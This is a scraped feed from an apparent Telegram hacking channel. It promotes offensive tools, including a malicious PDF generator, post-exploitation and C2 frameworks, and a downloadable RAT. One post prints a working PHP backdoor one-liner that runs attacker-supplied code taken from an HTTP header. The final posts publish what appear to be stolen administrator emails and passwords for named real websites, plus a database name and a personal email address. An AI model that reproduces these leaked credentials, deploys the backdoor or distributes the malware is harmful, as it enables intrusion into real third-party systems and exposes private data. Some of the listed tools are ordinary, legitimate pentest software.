Malicious PDF Generator β οΈ
Generate ten different malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh
Usage
Purpose
βͺοΈ Test web pages/services accepting PDF-files
βͺοΈ Test security products
βͺοΈ Test PDF readers
βͺοΈ Test PDF converters
GitHub
#RedTeam #PDF #Pentesting
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
Generate ten different malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh
Usage
βββ(BugCod3γΏkali)-[~]
ββ$ python3 malicious-pdf.py burp-collaborator-url
Output will be written as: test1.pdf, test2.pdf, test3.pdf etc in the current directory.Purpose
βͺοΈ Test web pages/services accepting PDF-files
βͺοΈ Test security products
βͺοΈ Test PDF readers
βͺοΈ Test PDF converters
GitHub
#RedTeam #PDF #Pentesting
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
π₯4
VIPER
βͺοΈ Viper is a graphical intranet penetration tool, which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration
βͺοΈ Viper integrates basic functions such as bypass anti-virus software, intranet tunnel, file management, command line and so on
βͺοΈ Viper has integrated 80+ modules, covering Resource Development / Initial Access / Execution / Persistence / Privilege Escalation / Defense Evasion / Credential Access / Discovery / Lateral Movement / Collection and other categories
βͺοΈ Viper's goal is to help red team engineers improve attack efficiency, simplify operation and reduce technical threshold
βͺοΈ Viper supports running native msfconsole in browser and multi - person collaboration
Site
Installation manual
GitHub
#RedTeam #Viper #Post_Exploitation
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
βͺοΈ Viper is a graphical intranet penetration tool, which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration
βͺοΈ Viper integrates basic functions such as bypass anti-virus software, intranet tunnel, file management, command line and so on
βͺοΈ Viper has integrated 80+ modules, covering Resource Development / Initial Access / Execution / Persistence / Privilege Escalation / Defense Evasion / Credential Access / Discovery / Lateral Movement / Collection and other categories
βͺοΈ Viper's goal is to help red team engineers improve attack efficiency, simplify operation and reduce technical threshold
βͺοΈ Viper supports running native msfconsole in browser and multi - person collaboration
Site
Installation manual
GitHub
#RedTeam #Viper #Post_Exploitation
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
β€1π«‘1
WinPwn
To automate as many internal penetrationtest processes (reconnaissance as well as exploitation) and for the proxy reason I wrote my own script with automatic proxy recognition and integration.
The script is mostly based on well-known large other offensive security Powershell projects.
GitHub
#RedTeam #PowerShell #Pentesting
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
To automate as many internal penetrationtest processes (reconnaissance as well as exploitation) and for the proxy reason I wrote my own script with automatic proxy recognition and integration.
The script is mostly based on well-known large other offensive security Powershell projects.
GitHub
#RedTeam #PowerShell #Pentesting
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
π₯1
Full-featured C2 framework which silently persists on
webserver via polymorphic PHP oneliner
Overview
The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:
Efficient: More than 20 plugins to automate privilege-escalation tasks
Stealth: The framework is made by paranoids, for paranoids
Convenient: A robust interface with many crucial features
Supported platforms (as attacker):
#RedTeam #Web_Hacking #HackTool
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
webserver via polymorphic PHP oneliner
Overview
The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>Features
Efficient: More than 20 plugins to automate privilege-escalation tasks
Stealth: The framework is made by paranoids, for paranoids
Convenient: A robust interface with many crucial features
Supported platforms (as attacker):
GNU/LinuxSupported platforms (as target):
Mac OS X
GNU/LinuxGitHub
BSD-like
Mac OS X
Windows NT
#RedTeam #Web_Hacking #HackTool
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
π€―1
Grabber Zone-H
Download
#Grabber #ZoneH
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
Download
#Grabber #ZoneH
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
π€―1
Snoop Project
Snoop Project One of the most promising OSINT tools to search for nicknames
This is the most powerful software taking into account the CIS location.
Is your life slideshow? Ask Snoop.
Snoop project is developed without taking into account the opinions of the NSA and their friends,
that is, it is available to the average user
GNU/Linux β
Windows 7/10 (32/64) β
Android (Termux) β
macOS βοΈ
IOS π«
WSL π«
GitHub
Download
#RedTeam #Scanner #Osint #Username_Search
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
Snoop Project One of the most promising OSINT tools to search for nicknames
This is the most powerful software taking into account the CIS location.
Is your life slideshow? Ask Snoop.
Snoop project is developed without taking into account the opinions of the NSA and their friends,
that is, it is available to the average user
GNU/Linux β
Windows 7/10 (32/64) β
Android (Termux) β
macOS βοΈ
IOS π«
WSL π«
GitHub
Download
#RedTeam #Scanner #Osint #Username_Search
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
β€1π1π₯1π’1
CobaltStrike support
Support CobaltStrike's security assessment of other platforms (Linux/MacOS/...), and include the development support of Unix post-penetration module
GitHub
#RedTeam #Cobalt_Strike #Cross_Platform
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
Support CobaltStrike's security assessment of other platforms (Linux/MacOS/...), and include the development support of Unix post-penetration module
GitHub
#RedTeam #Cobalt_Strike #Cross_Platform
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
β‘2β€1
This media is not supported in your browser
VIEW IN TELEGRAM
pwndrop
pwndrop is a self-deployable file hosting service for sending out red teaming payloads or securely sharing your private files over HTTP and WebDAV.
If you've ever needed to quickly set up an nginx/apache web server to host your files and you were never happy with the limitations of python -m SimpleHTTPServer, pwndrop is definitely for you!
GitHub
#RedTeam #Self_Hosted #file_sharing
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
pwndrop is a self-deployable file hosting service for sending out red teaming payloads or securely sharing your private files over HTTP and WebDAV.
If you've ever needed to quickly set up an nginx/apache web server to host your files and you were never happy with the limitations of python -m SimpleHTTPServer, pwndrop is definitely for you!
GitHub
#RedTeam #Self_Hosted #file_sharing
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
β‘1π1
888 Rat
Download
#Rat #Windows #Android
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
Download
#Rat #Windows #Android
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
π’1
Awesome-Bugbounty-Writeups
A list of writeups in the field of Bug Bunty
GitHub
#Writeup
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
A list of writeups in the field of Bug Bunty
GitHub
#Writeup
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
π2β‘1
Penetration-Testing-Tools
A collection of my Penetration Testing Tools, Scripts, Cheatsheets
This is a collection of more than a 160+ tools, scripts, cheatsheets and other loots that I've been developing over years for Penetration Testing and IT Security audits purposes. Most of them came handy at least once during my real-world engagements.
Notice: In order to clone this repository properly - use
#RedTeam #Pentesting #Tools
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
A collection of my Penetration Testing Tools, Scripts, Cheatsheets
This is a collection of more than a 160+ tools, scripts, cheatsheets and other loots that I've been developing over years for Penetration Testing and IT Security audits purposes. Most of them came handy at least once during my real-world engagements.
Notice: In order to clone this repository properly - use
--recurse-submodulesswitch:
git clone --recurse https://github.com/mgeeky/Penetration-Testing-Tools.git
GitHub#RedTeam #Pentesting #Tools
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
β‘1
ffuf - Fuzz Faster U Fool
A fast web fuzzer written in Go.
Installation
Download a prebuilt binary from releases page, unpack and run!
or
If you are on macOS with homebrew, ffuf can be installed with:
If you have recent go compiler installed:
or
GitHub
#Web #InfoSec #Fuzzer
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
A fast web fuzzer written in Go.
Installation
Download a prebuilt binary from releases page, unpack and run!
or
If you are on macOS with homebrew, ffuf can be installed with:
brew install ffufor
If you have recent go compiler installed:
go install github.com/ffuf/ffuf/v2@latest(the same command works for updating)
or
git clone https://github.com/ffuf/ffuf ; cd ffuf ; go get ; go buildFfuf depends on Go 1.16 or greater.
GitHub
#Web #InfoSec #Fuzzer
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
β‘2
Commix (short for [comm]and [i]njection e[x]ploiter) is an open source penetration testing tool, written by Anastasios Stasinopoulos (@ancst), that automates the detection and exploitation of command injection vulnerabilities.
Installation
You can download commix on any platform by cloning the official Git repository :
Note: Python (version 2.6, 2.7 or 3.x) is required for running commix.
Usage
To get a list of all options and switches use:
GitHub
#RedTeam #BugBounty #Command_Injection #Tools
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
Installation
You can download commix on any platform by cloning the official Git repository :
$ git clone https://github.com/commixproject/commix.git commixAlternatively, you can download the latest tarball or zipball.
Note: Python (version 2.6, 2.7 or 3.x) is required for running commix.
Usage
To get a list of all options and switches use:
$ python commix.py -hTo get an overview of commix available options, switches and/or basic ideas on how to use commix, check usage, usage examples and filters bypasses wiki pages.
GitHub
#RedTeam #BugBounty #Command_Injection #Tools
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
β‘1
Dork Scraper
Scrape website URLs using Google Dorks.
GitHub
#RedTeam #Dork #Scraper #Google
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
Scrape website URLs using Google Dorks.
GitHub
#RedTeam #Dork #Scraper #Google
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
π3
Gobuster
Gobuster is a tool used to brute-force:
βͺοΈ URIs (directories and files) in web sites.
βͺοΈ DNS subdomains (with wildcard support).
βͺοΈ Virtual Host names on target web servers.
βͺοΈ Open Amazon S3 buckets
βͺοΈ Open Google Cloud buckets
βͺοΈ TFTP servers
GitHub
β¬οΈ Download
π
#Go #Dns #Web #Pentesting #Tools
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
Gobuster is a tool used to brute-force:
βͺοΈ URIs (directories and files) in web sites.
βͺοΈ DNS subdomains (with wildcard support).
βͺοΈ Virtual Host names on target web servers.
βͺοΈ Open Amazon S3 buckets
βͺοΈ Open Google Cloud buckets
βͺοΈ TFTP servers
GitHub
β¬οΈ Download
π
BugCod3#Go #Dns #Web #Pentesting #Tools
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
π3
Subfinder
We have made it to comply with all the used passive source licenses and usage restrictions. The passive model guarantees speed and stealthiness that can be leveraged by both penetration testers and bug bounty hunters alike.
βͺοΈ Fast and powerful resolution and wildcard elimination modules
βͺοΈ Curated passive sources to maximize results
βͺοΈ Multiple output formats supported (JSON, file, stdout)
βͺοΈ Optimized for speed and lightweight on resources
βͺοΈ STDIN/OUT support enables easy integration into workflows
GitHub
#Osint #BugBounty #SubDomains
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
subfinder is a subdomain discovery tool that returns valid subdomains for websites, using passive online sources. It has a simple, modular architecture and is optimized for speed. subfinder is built for doing one thing only - passive subdomain enumeration, and it does that very well.We have made it to comply with all the used passive source licenses and usage restrictions. The passive model guarantees speed and stealthiness that can be leveraged by both penetration testers and bug bounty hunters alike.
βͺοΈ Fast and powerful resolution and wildcard elimination modules
βͺοΈ Curated passive sources to maximize results
βͺοΈ Multiple output formats supported (JSON, file, stdout)
βͺοΈ Optimized for speed and lightweight on resources
βͺοΈ STDIN/OUT support enables easy integration into workflows
GitHub
#Osint #BugBounty #SubDomains
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
httpxis a fast and multi-purpose HTTP toolkit that allows running multiple probes using the retryablehttp library. It is designed to maintain result reliability with an increased number of threads.
βͺοΈ Simple and modular code base making it easy to contribute.
βͺοΈ Fast And fully configurable flags to probe multiple elements.
βͺοΈ Supports multiple HTTP based probings.
βͺοΈ Smart auto fallback from https to http as default.
βͺοΈ Supports hosts, URLs and CIDR as input.
βͺοΈ Handles edge cases doing retries, backoffs etc for handling WAFs.
GitHUb
#osint #ssl_certificate #bugbounty #cybersecurity
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
FinalRecon is an automatic web reconnaissance tool written in python. Goal of FinalRecon is to provide an overview of the target in a short amount of time while maintaining the accuracy of results. Instead of executing several tools one after another it can provide similar results keeping dependencies small and simple.
FinalRecon provides detailed information such as :
βͺοΈ Header Information
βͺοΈ Whois
βͺοΈ SSL Certificate Information
βͺοΈ Crawler
...
βͺοΈ DNS Enumeration
...
βͺοΈ Subdomain Enumeration
...
βͺοΈ Directory Searching
...
βͺοΈ Wayback Machine
...
βͺοΈ Port Scan
...
βͺοΈ Export
...
Github
#pentesting #web #Tools
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
FinalRecon provides detailed information such as :
βͺοΈ Header Information
βͺοΈ Whois
βͺοΈ SSL Certificate Information
βͺοΈ Crawler
...
βͺοΈ DNS Enumeration
...
βͺοΈ Subdomain Enumeration
...
βͺοΈ Directory Searching
...
βͺοΈ Wayback Machine
...
βͺοΈ Port Scan
...
βͺοΈ Export
...
Github
#pentesting #web #Tools
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
β‘3
π https://www.ntbcl.com
π€ name: Admin
π§ email: ntbcl_adminn@ntbcl.com
π password: NewP30MAY@$#
π« login page: N/A
#web #sql
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
π€ name: Admin
π§ email: ntbcl_adminn@ntbcl.com
π password: NewP30MAY@$#
π« login page: N/A
#web #sql
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
π aeronsindia.com
π€ Name: Admin
π§ Email: admin@aeronsindia.com
π Password: admin12345
π§ Email: anilverm404@gmail.com
π Password: 123
π Version: 5.6.51
π Database: aeronsin_web
π« login page: N/A
#web #sql
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3
π€ Name: Admin
π§ Email: admin@aeronsindia.com
π Password: admin12345
π§ Email: anilverm404@gmail.com
π Password: 123
π Version: 5.6.51
π Database: aeronsin_web
π« login page: N/A
#web #sql
ββββββββββ
π€ T.me/MRvirusIRBOT
π’ T.me/BugCod3